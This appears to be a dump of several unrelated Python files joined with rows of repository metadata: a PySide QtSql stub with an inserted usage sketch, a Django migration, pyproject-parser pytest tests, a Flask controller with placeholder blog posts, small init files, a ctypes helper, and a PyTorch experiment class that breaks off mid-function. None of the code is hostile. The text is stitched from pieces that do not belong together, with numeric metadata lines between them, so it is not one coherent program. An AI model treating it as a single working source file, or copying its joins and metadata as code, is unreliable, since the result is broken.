def setData(self, *args, **kwargs): # real signature unknown
pass
def setEditStrategy(self, *args, **kwargs): # real signature unknown
pass
def setFilter(self, *args, **kwargs): # real signature unknown
pass
def setPrimaryKey(self, *args, **kwargs): # real signature unknown
pass
def setQuery(self, *args, **kwargs): # real signature unknown
pass
def setRecord(self, *args, **kwargs): # real signature unknown
pass
def setSort(self, *args, **kwargs): # real signature unknown
pass
def setTable(self, *args, **kwargs): # real signature unknown
pass
def sort(self, *args, **kwargs): # real signature unknown
pass
def submit(self, *args, **kwargs): # real signature unknown
pass
def submitAll(self, *args, **kwargs): # real signature unknown
pass
def tableName(self, *args, **kwargs): # real signature unknown
pass
def updateRowInTable(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
EditStrategy = None # (!) real value is "<type 'PySide.QtSql.QSqlTableModel.EditStrategy'>"
OnFieldChange = PySide.QtSql.QSqlTableModel.EditStrategy.OnFieldChange
OnManualSubmit = PySide.QtSql.QSqlTableModel.EditStrategy.OnManualSubmit
OnRowChange = PySide.QtSql.QSqlTableModel.EditStrategy.OnRowChange
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E22C8>'
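The stub above carries no documentation; the following is a hypothetical usage sketch of the real QSqlTableModel API. The table name "employee" and the in-memory SQLite connection are assumptions for illustration, and the import is guarded so the sketch degrades gracefully when PySide is not installed.

```python
try:
    from PySide.QtSql import QSqlDatabase, QSqlTableModel
    HAVE_PYSIDE = True
except ImportError:
    HAVE_PYSIDE = False  # PySide is optional here; nothing below is executed without it

def edit_table():
    """Select a table and batch edits with the OnManualSubmit strategy."""
    db = QSqlDatabase.addDatabase("QSQLITE")
    db.setDatabaseName(":memory:")
    if not db.open():
        return False
    model = QSqlTableModel()
    model.setTable("employee")                            # hypothetical table name
    model.setEditStrategy(QSqlTableModel.OnManualSubmit)  # cache edits until submitAll()
    model.select()                                        # run the SELECT
    # ... edit rows via model.setData(index, value) here ...
    return model.submitAll()                              # flush all cached edits at once
```

With OnFieldChange or OnRowChange the model would instead write back on every field or row change, without the explicit submitAll() call.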
class QSqlRelationalTableModel(QSqlTableModel):
# no doc
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def insertRowIntoTable(self, *args, **kwargs): # real signature unknown
pass
def orderByClause(self, *args, **kwargs): # real signature unknown
pass
def relation(self, *args, **kwargs): # real signature unknown
pass
def relationModel(self, *args, **kwargs): # real signature unknown
pass
def removeColumns(self, *args, **kwargs): # real signature unknown
pass
def revertRow(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectStatement(self, *args, **kwargs): # real signature unknown
pass
def setData(self, *args, **kwargs): # real signature unknown
pass
def setRelation(self, *args, **kwargs): # real signature unknown
pass
def setTable(self, *args, **kwargs): # real signature unknown
pass
def updateRowInTable(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E2748>'
class QSqlResult(__Shiboken.Object):
# no doc
def addBindValue(self, *args, **kwargs): # real signature unknown
pass
def at(self, *args, **kwargs): # real signature unknown
pass
def bindingSyntax(self, *args, **kwargs): # real signature unknown
pass
def bindValue(self, *args, **kwargs): # real signature unknown
pass
def bindValueType(self, *args, **kwargs): # real signature unknown
pass
def boundValue(self, *args, **kwargs): # real signature unknown
pass
def boundValueCount(self, *args, **kwargs): # real signature unknown
pass
def boundValueName(self, *args, **kwargs): # real signature unknown
pass
def boundValues(self, *args, **kwargs): # real signature unknown
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def detachFromResultSet(self, *args, **kwargs): # real signature unknown
pass
def driver(self, *args, **kwargs): # real signature unknown
pass
def execBatch(self, *args, **kwargs): # real signature unknown
pass
def executedQuery(self, *args, **kwargs): # real signature unknown
pass
def exec_(self, *args, **kwargs): # real signature unknown
pass
def fetch(self, *args, **kwargs): # real signature unknown
pass
def fetchFirst(self, *args, **kwargs): # real signature unknown
pass
def fetchLast(self, *args, **kwargs): # real signature unknown
pass
def fetchNext(self, *args, **kwargs): # real signature unknown
pass
def fetchPrevious(self, *args, **kwargs): # real signature unknown
pass
def handle(self, *args, **kwargs): # real signature unknown
pass
def hasOutValues(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def isSelect(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def lastInsertId(self, *args, **kwargs): # real signature unknown
pass
def lastQuery(self, *args, **kwargs): # real signature unknown
pass
def nextResult(self, *args, **kwargs): # real signature unknown
pass
def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def numRowsAffected(self, *args, **kwargs): # real signature unknown
pass
def prepare(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def reset(self, *args, **kwargs): # real signature unknown
pass
def savePrepare(self, *args, **kwargs): # real signature unknown
pass
def setActive(self, *args, **kwargs): # real signature unknown
pass
def setAt(self, *args, **kwargs): # real signature unknown
pass
def setForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def setLastError(self, *args, **kwargs): # real signature unknown
pass
def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def setQuery(self, *args, **kwargs): # real signature unknown
pass
def setSelect(self, *args, **kwargs): # real signature unknown
pass
def size(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
BatchOperation = PySide.QtSql.QSqlResult.VirtualHookOperation.BatchOperation
BindingSyntax = None # (!) real value is "<type 'PySide.QtSql.QSqlResult.BindingSyntax'>"
DetachFromResultSet = PySide.QtSql.QSqlResult.VirtualHookOperation.DetachFromResultSet
NamedBinding = PySide.QtSql.QSqlResult.BindingSyntax.NamedBinding
NextResult = PySide.QtSql.QSqlResult.VirtualHookOperation.NextResult
PositionalBinding = PySide.QtSql.QSqlResult.BindingSyntax.PositionalBinding
SetNumericalPrecision = PySide.QtSql.QSqlResult.VirtualHookOperation.SetNumericalPrecision
VirtualHookOperation = None # (!) real value is "<type 'PySide.QtSql.QSqlResult.VirtualHookOperation'>"
| 30.686434 | 109 | 0.644818 | 4,151 | 37,775 | 5.733799 | 0.085522 | 0.188437 | 0.289904 | 0.237469 | 0.767867 | 0.742826 | 0.742826 | 0.737784 | 0.584177 | 0.573295 | 0 | 0.00326 | 0.244818 | 37,775 | 1,230 | 110 | 30.711382 | 0.831072 | 0.312852 | 0 | 0.707286 | 0 | 0 | 0.000987 | 0.000987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.433417 | false | 0.43593 | 0.003769 | 0 | 0.548995 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
05dc2074721141f00b34044df711a3da9d355caa | 2,008 | py | Python | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/upload_resume | c2061afadcfe3f2d29abab3aac3c86f2e9c92520 | [
"MIT"
] | 1 | 2021-09-26T11:33:42.000Z | 2021-09-26T11:33:42.000Z | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/Ultimate | caee13349338062ef1153d9a9292b9bf6a755603 | [
"MIT"
] | null | null | null | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/Ultimate | caee13349338062ef1153d9a9292b9bf6a755603 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-08-09 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0004_auto_20210809_1641'),
]
operations = [
migrations.AlterField(
model_name='professional',
name='Fifth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='First_Skill',
field=models.CharField(max_length=120, null=True),
),
migrations.AlterField(
model_name='professional',
name='Fist_Language',
field=models.CharField(max_length=112, null=True),
),
migrations.AlterField(
model_name='professional',
name='Fourth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Second_Language',
field=models.CharField(blank=True, max_length=112),
),
migrations.AlterField(
model_name='professional',
name='Second_Skill',
field=models.CharField(max_length=120, null=True),
),
migrations.AlterField(
model_name='professional',
name='Seventh_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Sixth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Third_Language',
field=models.CharField(blank=True, max_length=112),
),
migrations.AlterField(
model_name='professional',
name='Third_Skill',
field=models.CharField(max_length=120, null=True),
),
]
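The ten AlterField operations above follow one simple rule; this plain-Python sketch reconstructs the CharField options each field receives. The field names are copied from the migration (including the repo's `Fist_Language` spelling), but the rule itself is inferred from the operations, not taken from the model source.

```python
# Skill columns get max_length=120, language columns 112; First/Second/Third
# skill and the first language use null=True, all remaining fields blank=True.
REQUIRED = {"First_Skill", "Second_Skill", "Third_Skill", "Fist_Language"}

def char_field_options(name):
    """Return the CharField kwargs the migration assigns to `name`."""
    max_length = 112 if "Language" in name else 120
    if name in REQUIRED:
        return {"max_length": max_length, "null": True}
    return {"max_length": max_length, "blank": True}
```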
| 31.375 | 63 | 0.571713 | 189 | 2,008 | 5.899471 | 0.259259 | 0.179372 | 0.224215 | 0.26009 | 0.830493 | 0.804484 | 0.764126 | 0.744395 | 0.696861 | 0.656502 | 0 | 0.044396 | 0.315737 | 2,008 | 63 | 64 | 31.873016 | 0.767103 | 0.02241 | 0 | 0.684211 | 1 | 0 | 0.137175 | 0.011729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.070175 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af17407dfba024ee7d39a50ba72d0915bba320c9 | 5,884 | py | Python | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | 2 | 2021-09-20T10:09:34.000Z | 2021-12-26T01:15:59.000Z | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | 11 | 2021-04-11T08:49:54.000Z | 2022-02-05T16:41:21.000Z | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | null | null | null | # 3rd party
import pytest
from coincidence.regressions import AdvancedFileRegressionFixture
from domdf_python_tools.paths import PathPlus
from pyproject_examples.example_configs import COMPLETE_A, COMPLETE_A_WITH_FILES, COMPLETE_B, COMPLETE_PROJECT_A
# this package
from pyproject_parser import PyProject
UNORDERED = """\
[project]
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
name = "whey"
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
[tool.whey]
base-classifiers = [ "Development Status :: 4 - Beta",]
python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",]
python-implementations = [ "CPython", "PyPy",]
platforms = [ "Windows", "macOS", "Linux",]
license-key = "MIT"
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
"""
DUMPS_README_TEMPLATE = """\
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project]
name = "Whey"
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
{readme_block}
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
"""
COMPLETE_UNDERSCORE_NAME = """\
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project]
name = "toctree_plus"
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
[tool.whey]
base-classifiers = [ "Development Status :: 4 - Beta",]
python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",]
python-implementations = [ "CPython", "PyPy",]
platforms = [ "Windows", "macOS", "Linux",]
license-key = "MIT"
package = "whey"
"""
@pytest.mark.parametrize(
"toml_string",
[
pytest.param(COMPLETE_A, id="COMPLETE_A"),
pytest.param(COMPLETE_B, id="COMPLETE_B"),
pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"),
]
)
def test_dumps(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
config = PyProject.load(filename=tmp_pathplus / "pyproject.toml")
config.dump(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check(config.dumps(), extension=".toml")
def _param(readme_block: str, **kwargs):
return pytest.param(DUMPS_README_TEMPLATE.format(readme_block=readme_block), **kwargs)
@pytest.mark.parametrize(
"toml_string",
[
_param(readme_block="readme = 'README.rst'", id="string"),
_param(
readme_block="[project.readme]\ntext = 'This is the README'\ncontent-type = 'text/x-rst'",
id="dict_text"
),
_param(
readme_block="[project.readme]\nfile = 'README.rst'\ncontent-type = 'text/x-rst'",
id="dict_file"
),
]
)
def test_dumps_readme(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
(tmp_pathplus / "README.rst").write_clean("This is the README")
config = PyProject.load(filename=tmp_pathplus / "pyproject.toml")
config.dump(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check(config.dumps(), extension=".toml")
@pytest.mark.parametrize(
"toml_string",
[
pytest.param(COMPLETE_A, id="COMPLETE_A"),
pytest.param(COMPLETE_A_WITH_FILES, id="COMPLETE_A_WITH_FILES"),
pytest.param(COMPLETE_B, id="COMPLETE_B"),
pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"),
pytest.param(UNORDERED, id="UNORDERED"),
pytest.param(COMPLETE_UNDERSCORE_NAME, id="COMPLETE_UNDERSCORE_NAME"),
]
)
def test_reformat(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
(tmp_pathplus / "README.rst").write_clean("This is the README")
(tmp_pathplus / "LICENSE").write_clean("This is the LICENSE")
PyProject.reformat(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
# Should be no changes
PyProject.reformat(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
| 29.128713 | 112 | 0.708022 | 746 | 5,884 | 5.418231 | 0.202413 | 0.051707 | 0.064325 | 0.07719 | 0.815933 | 0.789213 | 0.789213 | 0.776348 | 0.752845 | 0.728105 | 0 | 0.015867 | 0.121686 | 5,884 | 201 | 113 | 29.273632 | 0.766254 | 0.007308 | 0 | 0.759259 | 0 | 0.04321 | 0.587631 | 0.058078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0 | 0.030864 | 0.006173 | 0.061728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af337e8e4d62809bec07e037a06660807b8abcb5 | 2,356 | py | Python | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | from flask import render_template
class Index:
    @staticmethod
    def index():
posts = [
{
"title": "Teste post do role",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem...",
"git":"andrelrg",
"tags":["dev", "life"],
"url":"teste-blog"
},
{
"title": "Isso não é um teste",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem...",
"git":"andrelrg",
"tags":["dev", "teste"],
"url":"teste-blog"
}
]
threads = [
{
"title": "Teste thread do role",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has...",
"url":"teste-blog"
},
{
"title": "Isso não é uma thread teste",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has...",
"url":"teste-blog"
},
]
        return render_template(
            'index.html',
            posts=posts,
            threads=threads,
            active='home',
        )
af470bd1fdd9adb905debecd1aaab9914140f9d1 | 39 | py | Python | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 78 | 2020-12-04T10:38:58.000Z | 2022-03-22T09:16:53.000Z | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 3 | 2021-01-14T21:46:34.000Z | 2022-02-23T17:20:41.000Z | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 26 | 2020-12-18T00:56:20.000Z | 2022-03-13T19:30:19.000Z | from .mirnet_model import mirnet_model
| 19.5 | 38 | 0.871795 | 6 | 39 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
af8b3667ba74de014f35c494b0517ab92619e8fe | 46 | py | Python | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | for i in (i*2 for i in range(3)):
print i
| 15.333333 | 33 | 0.565217 | 12 | 46 | 2.166667 | 0.583333 | 0.307692 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.304348 | 46 | 2 | 34 | 23 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
afa839fafca90869fd51fd714e826db3a073d094 | 113 | py | Python | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | from kids_math.utils import *
from kids_math.games import *
# from kids_math.img import ImageQueue
__all__ = []
| 18.833333 | 38 | 0.769912 | 17 | 113 | 4.705882 | 0.529412 | 0.3 | 0.45 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150442 | 113 | 5 | 39 | 22.6 | 0.833333 | 0.318584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bb8c34917644cc4e9b6fde0552bc7c0e5675e070 | 155 | py | Python | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 126 | 2019-07-19T14:42:41.000Z | 2022-03-21T22:22:19.000Z | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 176 | 2020-10-18T14:31:03.000Z | 2022-03-30T23:22:39.000Z | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 55 | 2019-08-02T09:32:33.000Z | 2021-12-22T11:25:51.000Z | import ctypes
def bytearray_at(addr, sz):
# TODO: Currently just copies contents as bytes, not mutable inplace
return ctypes.string_at(addr, sz)
| 22.142857 | 72 | 0.741935 | 23 | 155 | 4.913043 | 0.826087 | 0.106195 | 0.141593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187097 | 155 | 6 | 73 | 25.833333 | 0.896825 | 0.425806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a52c458e60eee09c7a484da75200cef9c20629b9 | 45,631 | py | Python | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | 4 | 2020-08-24T09:24:40.000Z | 2021-12-10T05:14:04.000Z | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | null | null | null | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | null | null | null | from datasets import *
from nets import *
from torch.utils.data.dataloader import DataLoader
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import time
# Definition of experiments
class Experiment(object):
def __init__(self, name=''):
self.name_ = name
@property
def name(self):
return self.name_
@name.setter
def name(self, value):
self.name_ = value
class ReverseExperiment(Experiment):
def __init__(self, dataset_setup, model_layers, delay: int, bidi=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100,
weight_decay=0, dropout=None, patience=0, data_dir='./data/reverse/',
name='', checkpoint_dir=None, device="cpu"):
super(ReverseExperiment, self).__init__(name)
self.delay = delay
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-3}
if self.bidi:
self.delay = 0
self.model_layers = 1
elif self.delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = ReverseData(set_type,
self.dataset_setup['input_classes'],
self.dataset_setup['sequence_length'],
self.dataset_setup['train_size'],
root_dir=self.data_dir,
device=self.device,
transform=DelayTransform(self.delay, device=self.device))
if self.seq_length is None:
self.seq_length = dataset.length
return dataset
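`DelayTransform` is defined in the project's `datasets` module and is not shown here; the following is a plain-Python sketch of the underlying idea — pad the input with `delay` extra steps so that when the output is read from step `delay` onward (as `run()` does with `output[:, self.delay:, :]`), the recurrent state at each prediction has already consumed `delay` future frames. The zero padding value is an assumption for illustration.

```python
def delay_input(seq, delay, pad=0.0):
    """Append `delay` padding steps to a sequence of feature vectors.

    Reading the model output from step `delay` onward then aligns
    output step t + delay with target t, exposing inputs up to t + delay.
    """
    if delay == 0:
        return list(seq)
    width = len(seq[0])
    return list(seq) + [[pad] * width for _ in range(delay)]

x = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]   # 3 time steps, 2 features
xd = delay_input(x, 2)                      # now 5 steps; the last 2 are padding
```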
def model_setup(self):
# Setup a network based on experiment setup
model = None
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
self.dataset_setup['input_classes'],
self.rnn_units,
self.dataset_setup['input_classes'],
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(self.dataset_setup['input_classes'],
self.rnn_units,
self.dataset_setup['input_classes'],
bidi=self.bidi,
dropout=self.dropout).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
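`model_setup` pairs `NLLLoss` with the `F.log_softmax` applied later in `run()`; together they compute ordinary cross-entropy (the same computation `nn.CrossEntropyLoss` fuses into one call). The arithmetic for a single time step, in plain Python:

```python
import math

def log_softmax(logits):
    """Numerically stable log-softmax over one step's class logits."""
    m = max(logits)
    log_z = m + math.log(sum(math.exp(v - m) for v in logits))
    return [v - log_z for v in logits]

def nll_loss(log_probs, target):
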